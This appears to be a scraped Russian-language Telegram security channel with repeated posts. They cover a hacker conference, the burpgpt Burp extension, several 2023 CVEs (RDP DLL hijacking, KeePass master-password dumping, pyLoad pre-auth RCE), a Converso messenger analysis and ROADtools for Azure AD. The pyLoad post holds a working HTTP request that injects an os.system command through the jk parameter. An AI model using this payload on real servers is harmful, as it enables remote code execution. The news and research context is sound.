Второй день Positive Hack Days 13!
Сегодня тоже буду на PhD, кто захочет подойти, пишите мне в ЛС @здесь_был_username и я постараюсь оперативно вам ответить)
Напоминаю, Парк Горького от центрального входа прямо и направо (туда же, куда и толпа 😉 )
#phd12
Сегодня тоже буду на PhD, кто захочет подойти, пишите мне в ЛС @здесь_был_username и я постараюсь оперативно вам ответить)
#phd12
Please open Telegram to view this post
VIEW IN TELEGRAM
Довыкладываю некоторые фотки с прошедшего заключительного дня! В этот день к счастью было посвободнее)
Спасибо тем подписчикам, кто не пожалел время и приехал в Парк Горького. С вами было интересно поболтать и получил от вас ещё больший заряд мотивации для продвижения канала))
#phd12
Спасибо тем подписчикам, кто не пожалел время и приехал в Парк Горького. С вами было интересно поболтать и получил от вас ещё больший заряд мотивации для продвижения канала))
#phd12
❤6👏1
Forwarded from S.E.Book
burpgpt.
• A Burp Suite extension that integrates OpenAI's GPT to perform an additional passive scan for discovering highly bespoke vulnerabilities, and enables running traffic-based analysis of any type.
https://github.com/aress31/burpgpt
• A Burp Suite extension that integrates OpenAI's GPT to perform an additional passive scan for discovering highly bespoke vulnerabilities, and enables running traffic-based analysis of any type.
https://github.com/aress31/burpgpt
GitHub
GitHub - aress31/burpgpt: A Burp Suite extension that integrates OpenAI's GPT to perform an additional passive scan for discovering…
A Burp Suite extension that integrates OpenAI's GPT to perform an additional passive scan for discovering highly bespoke vulnerabilities and enables running traffic-based analysis of any ty...
❤3
Microsoft · Windows 10 22H2
Уязвимость удаленного выполнения кода в клиенте удаленного рабочего стола
CVE-2023-24905
Классическая техника под названием DLL Hijacking может использоваться для взлома RDP-клиента на устройствах Windows на ARM. Эта уязвимость позволяет злоумышленнику выполнить вредоносный код на системе жертвы, заменив легитимный DLL на вредоносный.
#CVE #RCE
Уязвимость удаленного выполнения кода в клиенте удаленного рабочего стола
CVE-2023-24905
Классическая техника под названием DLL Hijacking может использоваться для взлома RDP-клиента на устройствах Windows на ARM. Эта уязвимость позволяет злоумышленнику выполнить вредоносный код на системе жертвы, заменив легитимный DLL на вредоносный.
#CVE #RCE
Forwarded from Monkey Hacker
Pre-auth RCE in pyLoad (CVE-2023-0297)
😁
В функции
Ну и получилось так
pyLoad - это менеджер загрузки OSS, написанный на Python и управляемый через веб-интерфейс. В нем недавно нашли вулну и зарепортили на бб, связанную с js2py. Кратко это интеграция JS в Python В функции
eval_js(), заметили момент, что параметр jk выполняет JS код. Люди поковырялись и поняли, что туда спокойно можно положить любую команду.Ну и получилось так
POST /amogus/test HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
jk=pyimport%20os;os.system("touch%20/tmp/pwnd");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaPlease open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad: CVE-2023-0297: The Story of Finding Pre-auth RCE in pyLoad
CVE-2023-0297: The Story of Finding Pre-auth RCE in pyLoad - bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad
Проверил, интересный материал. Хоть и написан специфично, зато прямолинейно и понятно)
🔴KeePass 2.X Master Password Dumper
CVE-2023-32784
Кратко:
CVE-2023-32784 - это уязвимость в менеджере паролей KeePass. Эта уязвимость позволяет злоумышленнику извлечь мастер-пароль из памяти программного обеспечения, даже когда рабочее пространство заблокировано или больше не работает. Это серьезная уязвимость, так как она может позволить злоумышленнику получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Разбор:
Уязвимость вызвана ошибкой в обработке паролей KeePass. Когда пользователь вводит свой мастер-пароль, KeePass сохраняет его в памяти в открытом виде. Это означает, что пароль не зашифрован и может быть легко прочитан злоумышленником, если у него есть доступ к памяти процесса KeePass. Уязвимость может быть использована злоумышленником, который имеет физический доступ к компьютеру жертвы. Атакующий может использовать инструмент для выгрузки памяти процесса KeePass, а затем искать мастер-пароль в выгрузке. Как только злоумышленник получит мастер-пароль, он сможет получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Исправление:
Уязвимость была исправлена в KeePass 2.54. Пользователи, использующие более старую версию KeePass, должны обновиться до 2.54, чтобы защитить себя от этой уязвимости.
#CVE #critical
CVE-2023-32784
Кратко:
CVE-2023-32784 - это уязвимость в менеджере паролей KeePass. Эта уязвимость позволяет злоумышленнику извлечь мастер-пароль из памяти программного обеспечения, даже когда рабочее пространство заблокировано или больше не работает. Это серьезная уязвимость, так как она может позволить злоумышленнику получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Разбор:
Уязвимость вызвана ошибкой в обработке паролей KeePass. Когда пользователь вводит свой мастер-пароль, KeePass сохраняет его в памяти в открытом виде. Это означает, что пароль не зашифрован и может быть легко прочитан злоумышленником, если у него есть доступ к памяти процесса KeePass. Уязвимость может быть использована злоумышленником, который имеет физический доступ к компьютеру жертвы. Атакующий может использовать инструмент для выгрузки памяти процесса KeePass, а затем искать мастер-пароль в выгрузке. Как только злоумышленник получит мастер-пароль, он сможет получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Исправление:
Уязвимость была исправлена в KeePass 2.54. Пользователи, использующие более старую версию KeePass, должны обновиться до 2.54, чтобы защитить себя от этой уязвимости.
#CVE #critical
🔥5❤1🐳1
🟣Тестируем заявленные супервозможности нового защищённого мессенджера
Как я случайно взломал «несуществующую» базу данных и нашёл все приватные ключи в мессенджере с «эталонным» уровнем шифрования. Рассказ о подробном анализе Converso и развенчивании смелых заявлений разработчиков о том, что их продукт не собирает пользовательские данные, не отслеживает метаданные, не использует серверы и вообще является передовым решением в области конфиденциального обмена сообщениями, превосходящим всем известные WhatsApp, Telegram и Signal.
#appsec
Как я случайно взломал «несуществующую» базу данных и нашёл все приватные ключи в мессенджере с «эталонным» уровнем шифрования. Рассказ о подробном анализе Converso и развенчивании смелых заявлений разработчиков о том, что их продукт не собирает пользовательские данные, не отслеживает метаданные, не использует серверы и вообще является передовым решением в области конфиденциального обмена сообщениями, превосходящим всем известные WhatsApp, Telegram и Signal.
#appsec
👏3🆒1
🔴ROADtools
(Rogue Office 365 and Azure (active) Directory tools)
ROADtools - это фреймворк для взаимодействия с Azure AD. Он состоит из библиотеки (roadlib) со следующими компонентами:
1. Инструмент ROADrecon для изучения Azure AD. ROADrecon - это инструмент для исследования Azure AD. Чтобы обеспечить полную гибкость, инструмент использует для этого 3 простых шага:
1.1. Аутентификация
1.2. Сбор данных
1.3. Исследование или преобразование данных
2. Инструмент ROADtools Token eXchange (roadtx). ROADtools Token eXchange, или сокращенно roadtx, - это инструмент для автоматизации и реализации процессов аутентификации и регистрации в Azure AD. Он ориентирован на токены, такие как (первичные) токены обновления и токены доступа.
Установка:
(Rogue Office 365 and Azure (active) Directory tools)
ROADtools - это фреймворк для взаимодействия с Azure AD. Он состоит из библиотеки (roadlib) со следующими компонентами:
1. Инструмент ROADrecon для изучения Azure AD. ROADrecon - это инструмент для исследования Azure AD. Чтобы обеспечить полную гибкость, инструмент использует для этого 3 простых шага:
1.1. Аутентификация
1.2. Сбор данных
1.3. Исследование или преобразование данных
2. Инструмент ROADtools Token eXchange (roadtx). ROADtools Token eXchange, или сокращенно roadtx, - это инструмент для автоматизации и реализации процессов аутентификации и регистрации в Azure AD. Он ориентирован на токены, такие как (первичные) токены обновления и токены доступа.
Установка:
pip install roadrecon
pip install roadtx#tools #recon